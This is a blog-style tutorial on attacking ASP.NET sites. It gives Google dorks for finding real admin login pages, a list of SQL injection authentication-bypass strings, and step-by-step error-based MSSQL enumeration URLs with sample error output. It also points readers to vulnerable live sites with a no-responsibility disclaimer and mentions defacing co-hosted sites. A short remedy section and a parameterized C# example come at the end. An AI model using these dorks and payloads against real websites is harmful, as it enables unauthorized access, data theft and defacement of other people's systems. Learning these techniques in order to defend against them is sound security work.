Web developers are under tight schedules to deliver products on time, so the security of the web application is often an afterthought and is usually delivered later.
Here I discuss two of the most common WORST practices of ASP.NET developers, along with the remedy for each.
1. Default usernames and passwords (username: admin & password: admin) in admin login portals. (Authentication bypass, in a security analyst's terms.)
2. Lack of secure programming. (SQL injection, in a security analyst's terms.)
Now, I would like to share the first part of our discussion.
I just googled by typing the following in the search bar.
".in inurl:admin_login.aspx"
".in inurl:adminlogin.asp"
".in inurl:admin/login.asp"
We can see that about one-tenth of a million results are displayed in no time.
I visited one of the admin login portals, as shown below. (I have not mentioned the complete URL of the website, to preserve its privacy.)
Now the real magic happens: I entered the username as admin and the password as 'or'0'='0 (a "magic quote", in a security analyst's view). Below is a snapshot of what we can mess with.
A list of such magic quotes, which you can enter in the password field (to confuse the database), follows:
- ' or '1'='1
- ' or 1=1--
- hi' or 1=1 --
- 'or'1=1'
- ' or 'x'='x
- ' or 0=0 --
- " or "x"="x
- ') or ('x'='x
- " or 0=0 --
- or 0=0 --
- " or 1=1--
- or 1=1--
- ' or 0=0 #
- " or 0=0 #
- ' or a=a--
- " or "a"="a
- or 0=0 #
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- admin password
__________________________________________________________________
LOGIC BEHIND MAGIC QUOTES:
(Why they allow us to log in in this manner)
We learnt in our academics the concept of truth tables, i.e. OR gates, AND gates, etc. Databases use the same concept: the WHERE clause of the login query is evaluated as a boolean expression, and when it evaluates to true the application gives us access to the secure page. The injected quote closes the password string and appends or '0'='0', which is always true, so the whole condition is true no matter what the password comparison returned. I mean to say that 1 or 1 = 1 (that is what we learnt in OR gates), or we can say that true or true = true, which in turn evaluates to a true result.
___________________________________________________________________
If any of these websites allows us to upload files or malicious scripts, then certainly all the websites hosted on the same server are also exposed to the same things. The process of finding the websites hosted on the same server is called SERVER ROOTING. Anyone can easily gather important information hosted on the various websites on that server and can also DEFACE them.
About 20% of the total websites are found to be insecure in this manner. Even some government firms' websites are found to be insecure this way.
Below I share some of the vulnerable links that I found, and thereby I bear no responsibility if some mischief is done by YOU; this is strictly for knowledge purposes.
In fact, you can find hundreds of such sites.
Now, let’s look on the second part of our discussion.
ASP websites whose URLs look like www.somewebsite.com/page.asp?id=123 are more prone to SQL INJECTION. I googled by typing ".in .pak .uk inurl:asp?id" in the search bar and found the following results. (Of course, you can use any of the Google dorks to search.)
Below is the complete process.
STEPS:
Step 1: Find something like id=7 (as shown above, using a Google dork).
Step 2: Append ' (a single quote) to the end of the URL to check for an error. (If the page loads normally, the site is not vulnerable.)
Step 3: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables)) --
Step 4: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('<table_name>','<table_name>'))) --
Step 5: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' ))
http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' and column_name not in('<column_name>','<column_name>')))
Step 6: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 <column_name> from <table_name> )) --
How to find tables and columns in a vulnerable website?
The question that arises is "how will you find the table name?" Well, I have a nice solution for that too.
Follow these steps to learn the architecture of the tables and the database; by performing them we can find the table name and the column names.
- To do this, the attacker uses the 'having' clause of the 'select' statement in the username field, as shown above (login portals):
Username: ' having 1=1--
This provokes the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35
- So the attacker now knows the table name and the name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
(which produces the error...)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
- Eventually the attacker arrives at the following 'username':
Username: ' group by users.id, users.username, users.password, users.privs having 1=1--
... which produces no error and is functionally equivalent to:
select * from users where username = ''
- So in this way the attacker now knows that the query references only the 'users' table and uses the columns 'id, username, password, privs', in that order.
Although the above SQL injection is rare nowadays, it still exists.
REMEDY:
1. Filter out characters like the single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc. in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies
2. For numeric values, convert the value to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer.
3. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.
4. Delete stored procedures that you are not using, like:
master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
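As an added C#/ADO.NET example (not code from the original post), here is the concatenated query the vulnerable login builds, so the effect of the 'or'0'='0 password is visible, beside the remedy: a parameterized login check and an integer-validated lookup for the page.asp?id=123 case. The users and movies tables and their column names are assumptions.

```csharp
using System.Data;
using System.Data.SqlClient;

// Added example (not the post's own code). Table and column names are assumed.
public static class SqlInjectionRemedy
{
    // The vulnerable pattern: user input concatenated into SQL text. With the
    // password "'or'0'='0" the WHERE clause becomes
    //   username='admin' and password=''or'0'='0'
    // and the trailing OR makes the whole condition true for any password.
    public static string BuildVulnerableQuery(string username, string password)
    {
        return "select * from users where username='" + username +
               "' and password='" + password + "'";
    }

    // Remedy: send the values as parameters. The SQL text is fixed, so quotes,
    // "--" and "#" inside the input are only characters compared against data.
    // (A real login compares a password hash; plain text is kept for brevity.)
    public static bool CheckLogin(SqlConnection conn, string username, string password)
    {
        const string sql =
            "select count(*) from users where username=@user and password=@pass";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 50).Value = username;
            cmd.Parameters.Add("@pass", SqlDbType.NVarChar, 128).Value = password;
            return (int)cmd.ExecuteScalar() == 1;
        }
    }

    // Remedy for page.asp?id=123: accept only a plain integer before the value
    // gets anywhere near SQL (stricter than ISNUMERIC, which also accepts
    // "1e3" or "$5"), then still bind it as a typed parameter.
    public static bool TryLoadMovie(SqlConnection conn, string rawId, out string title)
    {
        title = null;
        // "123 and 1=convert(int,(select ...))" is rejected here; no query runs.
        if (!int.TryParse(rawId, out int id) || id <= 0)
            return false;
        const string sql = "select title from movies where movid=@id";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            title = cmd.ExecuteScalar() as string;
            return title != null;
        }
    }
}
```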
Recommended References:
Protect from SQL Injection in ASP.NET
One of the earliest works on SQL injection we have encountered is the paper from Rain Forest Puppy about how he hacked PacketStorm.
Great article on gathering information from ODBC error messages:
A good summary of SQL Injection on various SQL Server on:
SensePost's article on SQL injection:
http://www.sensepost.com/misc/SQLinsertion.htm